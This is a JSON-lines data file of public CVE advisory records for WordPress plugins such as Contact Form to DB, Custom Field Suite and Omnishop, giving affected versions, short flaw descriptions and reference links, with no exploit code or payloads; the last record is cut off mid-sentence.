{"CVE_ID":"CVE-2023-36508","slug":"contact-form-to-db","versionImpact":"1.7.1","description":"The Contact Form to DB by BestWebSoft plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in versions up to, and including, 1.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3517","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Accordion Widget in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4541890-4c0d-4348-91df-42cf4b575514?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4541890-4c0d-4348-91df-42cf4b575514?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/accordion.php#L745\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/accordion.php#L745\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3597","slug":"export-wp-page-to-static-html","versionImpact":"2.2.2","description":"The Export WP Page to Static HTML\/CSS plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 2.2.2. This is due to insufficient validation on the redirect url supplied via the rc_exported_zip_file parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/598e2c2e-7dd5-435e-a366-6c7569243f2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/598e2c2e-7dd5-435e-a366-6c7569243f2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/class-export-wp-page-to-static-html-admin.php#L1289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/class-export-wp-page-to-static-html-admin.php#L1289\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6722","slug":"chatbot-support-ai","versionImpact":"1.0.2","description":"The Chatbot Support AI: Free ChatGPT Chatbot, Woocommerce Chatbot WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce909d3c-2ef2-4167-87c4-75b5effb2a4d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce909d3c-2ef2-4167-87c4-75b5effb2a4d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11709","slug":"ai-post-generator","versionImpact":"3.5","description":"The AI Post Generator | AutoWriter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ai_post_generator_delete_Post AJAX action in all versions up to, and including, 3.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L430\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00ac468-870a-4c43-af25-9febea5e4d67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00ac468-870a-4c43-af25-9febea5e4d67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11196","slug":"multi-column-tag-map","versionImpact":"17.0.33","description":"The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-column-tag-map\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-column-tag-map\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11328","slug":"cluevo-lms","versionImpact":"1.13.2","description":"The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.13.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/admin-views\\\/class.module-ratings-page.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/admin-views\\\/class.module-ratings-page.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L788\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bcfe315-2db1-4f6c-9635-a7fdf5404adf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bcfe315-2db1-4f6c-9635-a7fdf5404adf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13397","slug":"wpradio","versionImpact":"1.0.4","description":"The WPRadio \u2013 WordPress Radio Streaming Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpradio_player' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpradio\\\/trunk\\\/Frontend\\\/Frontend.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpradio\\\/trunk\\\/Frontend\\\/Frontend.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153174a-1226-4c16-ba8b-637be1d7e742?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153174a-1226-4c16-ba8b-637be1d7e742?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6215","slug":"omnishop","versionImpact":"1.0.9","description":"The Omnishop plugin for WordPress is vulnerable to Unauthenticated Registration Bypass in all versions up to, and including, 1.0.9. Its \/users\/register endpoint is exposed to the public (permission_callback always returns true) and invokes wp_create_user() unconditionally,  ignoring the site\u2019s users_can_register option and any nonce or CAPTCHA checks. This makes it possible for unauthenticated attackers to create arbitrary user accounts (customer) on sites where registrations should be closed.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12d465d2-cd89-476e-b70a-743151a23053?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12d465d2-cd89-476e-b70a-743151a23053?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0619","slug":"kraken-image-optimizer","versionImpact":"2.6.8","description":"The Kraken.io Image Optimizer plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset image optimizations.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f94eabc5-6e3b-46df-9e36-d7d0fad833de\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f94eabc5-6e3b-46df-9e36-d7d0fad833de\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kraken-image-optimizer\\\/tags\\\/2.6.6\\\/kraken.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kraken-image-optimizer\\\/tags\\\/2.6.6\\\/kraken.php#L705\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0066","slug":"companion-sitemap-generator","versionImpact":"4.5.1.1","description":"The Companion Sitemap Generator WordPress plugin through 4.5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545c9e2f-bacd-4f30-ae01-de1583e26d32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545c9e2f-bacd-4f30-ae01-de1583e26d32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45846","slug":"image-map-pro ","versionImpact":"5.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in Nickys Image Map Pro for WordPress - Interactive SVG Image Map Builder plugin <\u00a05.6.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-map-pro-wordpress\\\/wordpress-image-map-pro-premium-plugin-5-5-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-map-pro-wordpress\\\/wordpress-image-map-pro-premium-plugin-5-5-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2584","slug":"pixelyoursite","versionImpact":"9.3.6","description":"The PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.3.6 (9.6.1 in the Pro version) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelyoursite\\\/trunk\\\/modules\\\/head_footer\\\/head_footer.php?rev=2773949#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelyoursite\\\/trunk\\\/modules\\\/head_footer\\\/head_footer.php?rev=2773949#L73\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ebf1e83-50b8-4f56-ba76-10100375edda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ebf1e83-50b8-4f56-ba76-10100375edda?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2912301%40pixelyoursite%2Ftrunk&old=2897911%40pixelyoursite%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2912301%40pixelyoursite%2Ftrunk&old=2897911%40pixelyoursite%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4408","slug":"dw-question-answer","versionImpact":"1.5.8","description":"The DW Question & Answer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.8. This is due to missing or incorrect nonce validation on the update_answer() function. This makes it possible for unauthenticated attackers to update answers to questions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dw-question-answer\\\/trunk\\\/inc\\\/Handle.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dw-question-answer\\\/trunk\\\/inc\\\/Handle.php#L138\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9852e499-f413-4218-9bac-6c2be62ecc32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9852e499-f413-4218-9bac-6c2be62ecc32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5054","slug":"superstorefinder-wp","versionImpact":"6.9.2","description":"The Super Store Finder plugin for WordPress is vulnerable to unauthenticated arbitrary email creation and relay in versions up to, and including, 6.9.2. This is due to insufficient restrictions on the sendMail.php file that allows direct access. This makes it possible for unauthenticated attackers to send emails utilizing the vulnerable site's server, with arbitrary content. Please note that this vulnerability has already been publicly disclosed with an exploit which is why we are publishing the details without a patch available, we are attempting to initiate contact with the developer.","refs":"[{\"url\":\"https:\\\/\\\/superstorefinder.net\\\/\",\"name\":\"https:\\\/\\\/superstorefinder.net\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d31d0553-9378-4c7e-a258-12562aa6b388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d31d0553-9378-4c7e-a258-12562aa6b388?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24410","slug":"fluentform","versionImpact":"4.3.25","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Contact Form - WPManageNinja LLC Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms fluentform allows SQL Injection.This issue affects Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms: from n\/a through 4.3.25.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluentform\\\/wordpress-fluentform-plugin-4-3-25-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluentform\\\/wordpress-fluentform-plugin-4-3-25-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3644","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10eb712a-d9c3-46c9-be6a-02811396fae8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10eb712a-d9c3-46c9-be6a-02811396fae8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3562","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.6.7 via the Loop custom field. This is due to insufficient sanitization of input prior to being used in a call to the eval() function. This makes it possible for authenticated attackers, with contributor-level access and above, to execute arbitrary PHP code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd7b788-03a0-41a4-96f2-cfca74ef281b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd7b788-03a0-41a4-96f2-cfca74ef281b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L192\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L192\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L224\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/loop.html\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/loop.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11459","slug":"country-blocker","versionImpact":"3.2","description":"The Country Blocker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ip' parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L597\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L597\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d8f2aaf-43db-412b-947c-ca1eb946c3aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d8f2aaf-43db-412b-947c-ca1eb946c3aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13153","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.135","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.135 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: Since the widget code isn't part of the code, to apply the patch, the affected widgets: Image Tooltip, Notification, Simple Popup, Video Play Button, and Card Carousel, must be deleted and reinstalled manually.","refs":"[{\"url\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99625a3e-b8a4-42f8-8996-f7c5c0ff2d5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99625a3e-b8a4-42f8-8996-f7c5c0ff2d5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13396","slug":"frictionless","versionImpact":"0.0.23","description":"The Frictionless plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'frictionless_form' shortcode[s] in all versions up to, and including, 0.0.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 